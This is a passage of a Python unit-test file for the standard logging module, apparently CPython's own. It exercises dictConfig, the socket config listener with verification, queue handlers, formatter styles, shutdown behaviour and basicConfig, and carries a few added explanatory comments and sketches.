"class": "logging.StreamHandler",
"level": "DEBUG",
"formatter": "mySimpleFormatter"
},
"bufferGlobal": {
"class": "logging.handlers.MemoryHandler",
"capacity": 5,
"formatter": "mySimpleFormatter",
"target": "fileGlobal",
"level": "DEBUG"
}
},
"loggers": {
"mymodule": {
"level": "DEBUG",
"handlers": ["bufferGlobal"],
"propagate": "true"
}
}
}
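# Added note: in out_of_order the MemoryHandler's 'target' is given as the string name
# 'fileGlobal'. dictConfig resolves that name to the already-configured handler object,
# deferring configuration of the MemoryHandler if its target has not been built yet, so the
# order of definition does not matter; test_out_of_order asserts that the resolved target is
# a real Handler instance.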
def apply_config(self, conf):
logging.config.dictConfig(conf)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# config2 contains a subtle error (a misspelt stream name), so applying it should raise.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config2a_failure(self):
# config2a contains a misspelt level on a handler, so applying it should raise.
self.assertRaises(Exception, self.apply_config, self.config2a)
def test_config2b_failure(self):
# config2b contains a misspelt level on a logger, so applying it should raise.
self.assertRaises(Exception, self.apply_config, self.config2b)
def test_config3_failure(self):
# config3 references an undefined formatter, so applying it should raise.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4a)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_failure(self):
self.assertRaises(Exception, self.apply_config, self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
#Same as test_config_7_ok but don't disable old loggers.
def test_config_8_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_8a_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8a)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config9)
logger = logging.getLogger("compiler.parser")
#Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
#Nothing will be output since the handler is still set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
#Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config10)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(Exception, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(Exception, self.apply_config, self.config13)
def test_config14_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config14)
h = logging._handlers['hand1']
self.assertEqual(h.foo, 'bar')
self.assertEqual(h.terminator, '!\n')
logging.warning('Exclamation')
self.assertTrue(output.getvalue().endswith('Exclamation!\n'))
@unittest.skipUnless(threading, 'listen() needs threading to work')
def setup_via_listener(self, text, verify=None):
text = text.encode("utf-8")
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0, verify)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
t.join(2.0)
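# Added note: logging.config.listen() accepts an optional verify callable. setup_via_listener
# above sends the configuration as a 4-byte big-endian length prefix followed by the encoded
# config text; on receipt, verify (if given) is called with those bytes and must return the
# (possibly transformed) bytes to apply, or None to reject the configuration.
# test_listen_verify below exercises both behaviours.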
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_listen_config_10_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_listen_config_1_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_listen_verify(self):
def verify_fail(stuff):
return None
def verify_reverse(stuff):
return stuff[::-1]
logger = logging.getLogger("compiler.parser")
to_send = textwrap.dedent(ConfigFileTest.config1)
# First, specify a verification function that will fail.
# We expect to see no output, since our configuration
# never took effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send, verify_fail)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([], stream=output)
# Original logger output has the stuff we logged.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform no verification. Our configuration
# should take effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send) # no verify callable specified
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform verification which transforms the bytes.
with support.captured_stdout() as output:
self.setup_via_listener(to_send[::-1], verify_reverse)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
def test_out_of_order(self):
self.apply_config(self.out_of_order)
handler = logging.getLogger('mymodule').handlers[0]
self.assertIsInstance(handler.target, logging.Handler)
self.assertIsInstance(handler.formatter._style,
logging.StringTemplateStyle)
def test_baseconfig(self):
d = {
'atuple': (1, 2, 3),
'alist': ['a', 'b', 'c'],
'adict': {'d': 'e', 'f': 3 },
'nest1': ('g', ('h', 'i'), 'j'),
'nest2': ['k', ['l', 'm'], 'n'],
'nest3': ['o', 'cfg://alist', 'p'],
}
bc = logging.config.BaseConfigurator(d)
self.assertEqual(bc.convert('cfg://atuple[1]'), 2)
self.assertEqual(bc.convert('cfg://alist[1]'), 'b')
self.assertEqual(bc.convert('cfg://nest1[1][0]'), 'h')
self.assertEqual(bc.convert('cfg://nest2[1][1]'), 'm')
self.assertEqual(bc.convert('cfg://adict.d'), 'e')
self.assertEqual(bc.convert('cfg://adict[f]'), 3)
v = bc.convert('cfg://nest3')
self.assertEqual(v.pop(1), ['a', 'b', 'c'])
self.assertRaises(KeyError, bc.convert, 'cfg://nosuch')
self.assertRaises(ValueError, bc.convert, 'cfg://!')
self.assertRaises(KeyError, bc.convert, 'cfg://adict[2]')
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
def test_set_log_record_factory(self):
man = logging.Manager(None)
expected = object()
man.setLogRecordFactory(expected)
self.assertEqual(man.logRecordFactory, expected)
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertIs(c1, logging.getLogger('xyz'))
self.assertIs(c2, logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertIs(c1, logging.getLogger('abc.def'))
self.assertIs(c2, logging.getLogger('abc.def.ghi'))
self.assertIs(c2, c3)
class DerivedLogRecord(logging.LogRecord):
pass
class LogRecordFactoryTest(BaseTest):
def setUp(self):
class CheckingFilter(logging.Filter):
def __init__(self, cls):
self.cls = cls
def filter(self, record):
t = type(record)
if t is not self.cls:
msg = 'Unexpected LogRecord type %s, expected %s' % (t,
self.cls)
raise TypeError(msg)
return True
BaseTest.setUp(self)
self.filter = CheckingFilter(DerivedLogRecord)
self.root_logger.addFilter(self.filter)
self.orig_factory = logging.getLogRecordFactory()
def tearDown(self):
self.root_logger.removeFilter(self.filter)
BaseTest.tearDown(self)
logging.setLogRecordFactory(self.orig_factory)
def test_logrecord_class(self):
self.assertRaises(TypeError, self.root_logger.warning,
self.next_message())
logging.setLogRecordFactory(DerivedLogRecord)
self.root_logger.error(self.next_message())
self.assert_log_lines([
('root', 'ERROR', '2'),
])
class QueueHandlerTest(BaseTest):
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.queue = queue.Queue(-1)
self.que_hdlr = logging.handlers.QueueHandler(self.queue)
self.que_logger = logging.getLogger('que')
self.que_logger.propagate = False
self.que_logger.setLevel(logging.WARNING)
self.que_logger.addHandler(self.que_hdlr)
def tearDown(self):
self.que_hdlr.close()
BaseTest.tearDown(self)
def test_queue_handler(self):
self.que_logger.debug(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
self.que_logger.info(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
msg = self.next_message()
self.que_logger.warning(msg)
data = self.queue.get_nowait()
self.assertIsInstance(data, logging.LogRecord)
self.assertEqual(data.name, self.que_logger.name)
self.assertEqual((data.msg, data.args), (msg, None))
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener(self):
handler = support.TestHandler(support.Matcher())
listener = logging.handlers.QueueListener(self.queue, handler)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertTrue(handler.matches(levelno=logging.WARNING, message='1'))
self.assertTrue(handler.matches(levelno=logging.ERROR, message='2'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='3'))
handler.close()
# Now test with respect_handler_level set
handler = support.TestHandler(support.Matcher())
handler.setLevel(logging.CRITICAL)
listener = logging.handlers.QueueListener(self.queue, handler,
respect_handler_level=True)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertFalse(handler.matches(levelno=logging.WARNING, message='4'))
self.assertFalse(handler.matches(levelno=logging.ERROR, message='5'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='6'))
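# Illustrative sketch (added; the name is hypothetical and it is never called by the tests):
# the typical QueueHandler/QueueListener pairing exercised above - records are put on a queue
# by QueueHandler and a QueueListener thread drains them into the real target handlers.
def _example_queue_logging():
    q = queue.Queue(-1)
    target = logging.StreamHandler()
    listener = logging.handlers.QueueListener(q, target)
    logger = logging.getLogger('example.queue')
    logger.addHandler(logging.handlers.QueueHandler(q))
    listener.start()
    try:
        logger.error('routed through the queue')
    finally:
        # stop() flushes any queued records to the target handler before returning.
        listener.stop()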
ZERO = datetime.timedelta(0)
class UTC(datetime.tzinfo):
def utcoffset(self, dt):
return ZERO
dst = utcoffset
def tzname(self, dt):
return 'UTC'
utc = UTC()
class FormatterTest(unittest.TestCase):
def setUp(self):
self.common = {
'name': 'formatter.test',
'level': logging.DEBUG,
'pathname': os.path.join('path', 'to', 'dummy.ext'),
'lineno': 42,
'exc_info': None,
'func': None,
'msg': 'Message with %d %s',
'args': (2, 'placeholders'),
}
self.variants = {
}
def get_record(self, name=None):
result = dict(self.common)
if name is not None:
result.update(self.variants[name])
return logging.makeLogRecord(result)
def test_percent(self):
# Test %-formatting
r = self.get_record()
f = logging.Formatter('${%(message)s}')
self.assertEqual(f.format(r), '${Message with 2 placeholders}')
f = logging.Formatter('%(random)s')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('%(asctime)s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)-15s')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime')
self.assertFalse(f.usesTime())
def test_braces(self):
# Test {}-formatting
r = self.get_record()
f = logging.Formatter('$%{message}%$', style='{')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('{random}', style='{')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('{asctime}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime!s:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='{')
self.assertFalse(f.usesTime())
def test_dollars(self):
# Test $-formatting
r = self.get_record()
f = logging.Formatter('$message', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$$%${message}%$$', style='$')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('${random}', style='$')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('${asctime', style='$')
self.assertFalse(f.usesTime())
f = logging.Formatter('$asctime', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='$')
self.assertFalse(f.usesTime())
def test_invalid_style(self):
self.assertRaises(ValueError, logging.Formatter, None, None, 'x')
def test_time(self):
r = self.get_record()
dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 0, utc)
# We use None to indicate we want the local timezone
# We're essentially converting a UTC time to local time
r.created = time.mktime(dt.astimezone(None).timetuple())
r.msecs = 123
f = logging.Formatter('%(asctime)s %(message)s')
f.converter = time.gmtime
self.assertEqual(f.formatTime(r), '1993-04-21 08:03:00,123')
self.assertEqual(f.formatTime(r, '%Y:%d'), '1993:21')
f.format(r)
self.assertEqual(r.asctime, '1993-04-21 08:03:00,123')
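# --- Illustrative sketch (not part of the test suite) --------------------------
# The three formatter styles exercised by FormatterTest, side by side, applied to
# a record built with logging.makeLogRecord(). All names below are hypothetical.
def _formatter_style_sketch():
    import logging
    record = logging.makeLogRecord({'msg': 'Message with %d %s',
                                    'args': (2, 'placeholders')})
    percent = logging.Formatter('%(message)s')
    braces = logging.Formatter('{message}', style='{')
    dollars = logging.Formatter('$message', style='$')
    # All three render the same text: 'Message with 2 placeholders'
    return [f.format(record) for f in (percent, braces, dollars)]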
class TestBufferingFormatter(logging.BufferingFormatter):
def formatHeader(self, records):
return '[(%d)' % len(records)
def formatFooter(self, records):
return '(%d)]' % len(records)
class BufferingFormatterTest(unittest.TestCase):
def setUp(self):
self.records = [
logging.makeLogRecord({'msg': 'one'}),
logging.makeLogRecord({'msg': 'two'}),
]
def test_default(self):
f = logging.BufferingFormatter()
self.assertEqual('', f.format([]))
self.assertEqual('onetwo', f.format(self.records))
def test_custom(self):
f = TestBufferingFormatter()
self.assertEqual('[(2)onetwo(2)]', f.format(self.records))
lf = logging.Formatter('<%(message)s>')
f = TestBufferingFormatter(lf)
self.assertEqual('[(2)<one><two>(2)]', f.format(self.records))
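# --- Illustrative sketch (not part of the test suite) --------------------------
# BufferingFormatter formats a whole batch of records, optionally delegating each
# record to a line Formatter, as exercised by BufferingFormatterTest above.
def _buffering_formatter_sketch():
    import logging
    records = [logging.makeLogRecord({'msg': m}) for m in ('one', 'two')]
    linefmt = logging.Formatter('<%(message)s>')
    return logging.BufferingFormatter(linefmt).format(records)  # '<one><two>'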
class ExceptionTest(BaseTest):
def test_formatting(self):
r = self.root_logger
h = RecordingHandler()
r.addHandler(h)
try:
raise RuntimeError('deliberate mistake')
except:
logging.exception('failed', stack_info=True)
r.removeHandler(h)
h.close()
r = h.records[0]
self.assertTrue(r.exc_text.startswith('Traceback (most recent '
'call last):\n'))
self.assertTrue(r.exc_text.endswith('\nRuntimeError: '
'deliberate mistake'))
self.assertTrue(r.stack_info.startswith('Stack (most recent '
'call last):\n'))
self.assertTrue(r.stack_info.endswith('logging.exception(\'failed\', '
'stack_info=True)'))
class LastResortTest(BaseTest):
def test_last_resort(self):
# Test the last resort handler
root = self.root_logger
root.removeHandler(self.root_hdlr)
old_lastresort = logging.lastResort
old_raise_exceptions = logging.raiseExceptions
try:
with support.captured_stderr() as stderr:
root.debug('This should not appear')
self.assertEqual(stderr.getvalue(), '')
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), 'Final chance!\n')
# No handlers and no last resort, so 'No handlers' message
logging.lastResort = None
with support.captured_stderr() as stderr:
root.warning('Final chance!')
msg = 'No handlers could be found for logger "root"\n'
self.assertEqual(stderr.getvalue(), msg)
# 'No handlers' message only printed once
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
# If raiseExceptions is False, no message is printed
root.manager.emittedNoHandlerWarning = False
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
finally:
root.addHandler(self.root_hdlr)
logging.lastResort = old_lastresort
logging.raiseExceptions = old_raise_exceptions
class FakeHandler:
def __init__(self, identifier, called):
for method in ('acquire', 'flush', 'close', 'release'):
setattr(self, method, self.record_call(identifier, method, called))
def record_call(self, identifier, method_name, called):
def inner():
called.append('{} - {}'.format(identifier, method_name))
return inner
class RecordingHandler(logging.NullHandler):
def __init__(self, *args, **kwargs):
super(RecordingHandler, self).__init__(*args, **kwargs)
self.records = []
def handle(self, record):
"""Keep track of all the emitted records."""
self.records.append(record)
class ShutdownTest(BaseTest):
"""Test suite for the shutdown method."""
def setUp(self):
super(ShutdownTest, self).setUp()
self.called = []
raise_exceptions = logging.raiseExceptions
self.addCleanup(setattr, logging, 'raiseExceptions', raise_exceptions)
def raise_error(self, error):
def inner():
raise error()
return inner
def test_no_failure(self):
# create some fake handlers
handler0 = FakeHandler(0, self.called)
handler1 = FakeHandler(1, self.called)
handler2 = FakeHandler(2, self.called)
# create live weakref to those handlers
handlers = map(logging.weakref.ref, [handler0, handler1, handler2])
logging.shutdown(handlerList=list(handlers))
expected = ['2 - acquire', '2 - flush', '2 - close', '2 - release',
'1 - acquire', '1 - flush', '1 - close', '1 - release',
'0 - acquire', '0 - flush', '0 - close', '0 - release']
self.assertEqual(expected, self.called)
def _test_with_failure_in_method(self, method, error):
handler = FakeHandler(0, self.called)
setattr(handler, method, self.raise_error(error))
handlers = [logging.weakref.ref(handler)]
logging.shutdown(handlerList=list(handlers))
self.assertEqual('0 - release', self.called[-1])
def test_with_ioerror_in_acquire(self):
self._test_with_failure_in_method('acquire', OSError)
def test_with_ioerror_in_flush(self):
self._test_with_failure_in_method('flush', OSError)
def test_with_ioerror_in_close(self):
self._test_with_failure_in_method('close', OSError)
def test_with_valueerror_in_acquire(self):
self._test_with_failure_in_method('acquire', ValueError)
def test_with_valueerror_in_flush(self):
self._test_with_failure_in_method('flush', ValueError)
def test_with_valueerror_in_close(self):
self._test_with_failure_in_method('close', ValueError)
def test_with_other_error_in_acquire_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('acquire', IndexError)
def test_with_other_error_in_flush_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('flush', IndexError)
def test_with_other_error_in_close_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('close', IndexError)
def test_with_other_error_in_acquire_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'acquire', IndexError)
def test_with_other_error_in_flush_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'flush', IndexError)
def test_with_other_error_in_close_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'close', IndexError)
class ModuleLevelMiscTest(BaseTest):
"""Test suite for some module level methods."""
def test_disable(self):
old_disable = logging.root.manager.disable
# confirm our assumptions are correct
self.assertEqual(old_disable, 0)
self.addCleanup(logging.disable, old_disable)
logging.disable(83)
self.assertEqual(logging.root.manager.disable, 83)
def _test_log(self, method, level=None):
called = []
support.patch(self, logging, 'basicConfig',
lambda *a, **kw: called.append((a, kw)))
recording = RecordingHandler()
logging.root.addHandler(recording)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me: %r", recording)
else:
log_method("test me: %r", recording)
self.assertEqual(len(recording.records), 1)
record = recording.records[0]
self.assertEqual(record.getMessage(), "test me: %r" % recording)
expected_level = level if level is not None else getattr(logging, method.upper())
self.assertEqual(record.levelno, expected_level)
# basicConfig was not called!
self.assertEqual(called, [])
def test_log(self):
self._test_log('log', logging.ERROR)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
def test_set_logger_class(self):
self.assertRaises(TypeError, logging.setLoggerClass, object)
class MyLogger(logging.Logger):
pass
logging.setLoggerClass(MyLogger)
self.assertEqual(logging.getLoggerClass(), MyLogger)
logging.setLoggerClass(logging.Logger)
self.assertEqual(logging.getLoggerClass(), logging.Logger)
@support.requires_type_collecting
def test_logging_at_shutdown(self):
# Issue #20037
code = """if 1:
import logging
class A:
def __del__(self):
try:
raise ValueError("some error")
except Exception:
logging.exception("exception in __del__")
a = A()"""
rc, out, err = assert_python_ok("-c", code)
err = err.decode()
self.assertIn("exception in __del__", err)
self.assertIn("ValueError: some error", err)
class LogRecordTest(BaseTest):
def test_str_rep(self):
r = logging.makeLogRecord({})
s = str(r)
self.assertTrue(s.startswith('<LogRecord: '))
self.assertTrue(s.endswith('>'))
def test_dict_arg(self):
h = RecordingHandler()
r = logging.getLogger()
r.addHandler(h)
d = {'less' : 'more' }
logging.warning('less is %(less)s', d)
self.assertIs(h.records[0].args, d)
self.assertEqual(h.records[0].message, 'less is more')
r.removeHandler(h)
h.close()
def test_multiprocessing(self):
r = logging.makeLogRecord({})
self.assertEqual(r.processName, 'MainProcess')
try:
import multiprocessing as mp
r = logging.makeLogRecord({})
self.assertEqual(r.processName, mp.current_process().name)
except ImportError:
pass
def test_optional(self):
r = logging.makeLogRecord({})
NOT_NONE = self.assertIsNotNone
if threading:
NOT_NONE(r.thread)
NOT_NONE(r.threadName)
NOT_NONE(r.process)
NOT_NONE(r.processName)
log_threads = logging.logThreads
log_processes = logging.logProcesses
log_multiprocessing = logging.logMultiprocessing
try:
logging.logThreads = False
logging.logProcesses = False
logging.logMultiprocessing = False
r = logging.makeLogRecord({})
NONE = self.assertIsNone
NONE(r.thread)
NONE(r.threadName)
NONE(r.process)
NONE(r.processName)
finally:
logging.logThreads = log_threads
logging.logProcesses = log_processes
logging.logMultiprocessing = log_multiprocessing
class BasicConfigTest(unittest.TestCase):
"""Test suite for logging.basicConfig."""
def setUp(self):
super(BasicConfigTest, self).setUp()
self.handlers = logging.root.handlers
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.original_logging_level = logging.root.level
self.addCleanup(self.cleanup)
logging.root.handlers = []
def tearDown(self):
for h in logging.root.handlers[:]:
logging.root.removeHandler(h)
h.close()
super(BasicConfigTest, self).tearDown()
def cleanup(self):
setattr(logging.root, 'handlers', self.handlers)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
logging.root.level = self.original_logging_level
def test_no_kwargs(self):
logging.basicConfig()
# handler defaults to a StreamHandler to sys.stderr
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, sys.stderr)
formatter = handler.formatter
# format defaults to logging.BASIC_FORMAT
self.assertEqual(formatter._style._fmt, logging.BASIC_FORMAT)
# datefmt defaults to None
self.assertIsNone(formatter.datefmt)
# style defaults to %
self.assertIsInstance(formatter._style, logging.PercentStyle)
# level is not explicitly set
self.assertEqual(logging.root.level, self.original_logging_level)
def test_strformatstyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="{")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_stringtemplatestyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="$")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_filename(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log')
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
expected = logging.FileHandler('test.log', 'a')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.assertEqual(handler.stream.name, expected.stream.name)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_filemode(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log', filemode='wb')
handler = logging.root.handlers[0]
expected = logging.FileHandler('test.log', 'wb')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_stream(self):
stream = io.StringIO()
self.addCleanup(stream.close)
logging.basicConfig(stream=stream)
